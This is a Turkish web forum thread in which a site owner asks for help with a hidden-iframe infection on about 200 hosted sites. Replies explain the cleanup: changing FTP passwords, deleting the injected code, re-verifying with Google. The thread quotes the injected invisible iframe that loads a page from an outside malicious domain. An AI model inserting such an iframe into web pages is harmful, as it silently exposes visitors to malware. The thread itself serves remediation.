Söyle bir konu var, ilgili olabilir mi?
http://www.pakzilla.com/2009/05/06/h...rcn-infection/
Merhaba arkadaşlar.
Son günlerde kafayı (nerdeyse) sıyırmama neden olabilecek bir konuda yardım istiyorum sizlerden. Hemen hemen 200'e yakın web sitesinin bulunduğu bir hostingde sorun. sorun hostingde olsa hemen çözülebilir ancak aşağıdaki kod bu hostingde ki bütün web sitelerinin index'lerinde bulunuyor.
şimdi bu kod sadece sayfa içerisinde dursa sorun çıkartmıyor. sorun şu ki zaman içerisinde bu kodun bulunduğu sayfa Google tarafından engelleniyor. Firefox'da siteye girdiğimde "Saldırgan olarak bildirilmiş site!" olarak uyarı veriyor. Bu durumda sitlerin ziyeretçi kaybetmesine neden oluyor.HTML Kodu:<iframe src="http://lotmachinesguide.cn/in.cgi?income58" width=1 height=1 style="visibility: hidden"></iframe>
Şimdi, en kısa yoldan bu durumdan nasıl kurtulabilirim? Lütfen yardım edin arkadaşlar.
Türkçe Konuş!
internet çöplüğünden renkli kırıntılar | renkli teneke
freelance web designer | meta dizayn
Söyle bir konu var, ilgili olabilir mi?
http://www.pakzilla.com/2009/05/06/h...rcn-infection/
Üyeler tanisiyor | Üyeler kendilerini tanitiyorlar.
İletisim Merkezi | Forumla ilgili sorulariniz, problem bildirimi icin lütfen daha fazla ö.m. atmayiniz.
Teşekkürler. Aslında ben bu virüsü temizlemekten daha çok nasıl bulaştığını merak etmeye başladım. Dün öğleden sonra temizlemeye başladım bütün sitelerde. Yavaş yavaş temizleyelim dedim ve henüz yeni bitti. Dediğin adrese baktım, internetten biraz araştırdım, biraz birşeyler buldum, faydası oldu.
Hâlâ anlamıyorum! Nasıl bulaşır böyle bir virüs? İlk defa başıma geldi böyle birşey.
Türkçe Konuş!
internet çöplüğünden renkli kırıntılar | renkli teneke
freelance web designer | meta dizayn
Sorunu cözdügüne sevindim.
Bulduklarini burada da paylasirsan, benzer sorun yasayanlara da yardimci olmus oluruz.
Üyeler tanisiyor | Üyeler kendilerini tanitiyorlar.
İletisim Merkezi | Forumla ilgili sorulariniz, problem bildirimi icin lütfen daha fazla ö.m. atmayiniz.
Benim bulduğum sonuçların hepsi farklı dillerdeydi. İngilizce olsa yine sorun olmayacak ama sonuçlar Macarca'ydı. Ben durumu nasıl düzellitimi anlatayım en iyisi.
Aşağıdaki kod web sitenizde(genelde) <body> kodundan hemen sonra yer alıyorsa web sitenize virüs bulaşmış demektir. Belli bir süre sonra bu virüs yüzünden web siteniz Google tarafından engelleniyor ve kullanıcıların girmemesini sağlıyor. Yani sitenin girişinde "Saldırgan olarak bildirilmiş site" gibi bir uyarı koyuyor. Bu da sizin için oldukça kötü bir durum. Şimdi bu durumu ben şöyle düzelttim.
İnternette sağdan soldan edindiğim bilgilere göre:HTML Kodu:<iframe src="http://lotmachinesguide.cn/in.cgi?income58" width=1 height=1 style="visibility: hidden"></iframe>
1. İlk önce FTP şifrenizi değiştirin.
2. Sitenizin index'inde bulunan bu kodu silin. Diğer sayfalarıda kontrol edin. Eğer varsa onlarıda silin.
3. Google Web Yöneticisi Araçları'nı kullanarak web sitesini sahiplenin. Bu aşamada web siteniz için doğrulama işlemleri yapmanız gerekiyor. Bu işlemleri sahiplenme aşamasında siz yönlendiriliyorsunuz.
4. Yukarıdaki adımları yaptıysanız 1 gün sonra web siteniz eskisi gibi çalışmaya devam edecektir.
Bu kadar (:
Türkçe Konuş!
internet çöplüğünden renkli kırıntılar | renkli teneke
freelance web designer | meta dizayn
Bu zımbırtı çoğunlukla ftp programlarındaki hafızaya alınmış şifrelerden yararlanıyor. Bu tip benzer bi kaç virüsteki çözümlemelerim bu şekildeydi. Eğer windows serverine bulaştıysa daha kapsamlı bir şeydir. Advanced Find and Replace programından faydalana bilirsin. eğer uzak sunucuya bağlanıyorsanız tüm şifreleri değiştirmenizde yarar var çünkü backdoor olarak oturuyor. o siteye giren her kez de normal olarak virüsü yiyor.
Virüs çoğunlukla sayfanın en altına index. htm,PHP,HTML yada config.PHP gibi portalların sürekli okuyacağı dosyalara kendini yerleştiriyor. Ben bir hosting satıcısı olarak tüm müşterilerime ftp programlarında şifre barındırmamalarını tavsiye ediyorum. Ayrıca combofix ve çeşitli benzer yazılımlarlada bilgisayarınızı tarayın işletim sistemine kendini hizmet olarak ekletip açılış dosyalarına backdoor için start veren, şifre dağıtan, notpad, frontpage gibi programların içine yerleşip her kayıtta altına kendini yazdırtan versiyonları mevcut.
izlenimlerim bunlar umarım fikir sahibi olmanıza yardımcı olabilmişimdir.
başka bi postta belirttiğim gibi:
crackli cuteftp gibi ftp programları kullanmayın!
ftp şifrelerinizi hackerlara gönderiyor. WinSCP gibi ultra güzel ve free programlar varken.. kendinizi ve sitelerinizi riske atmayın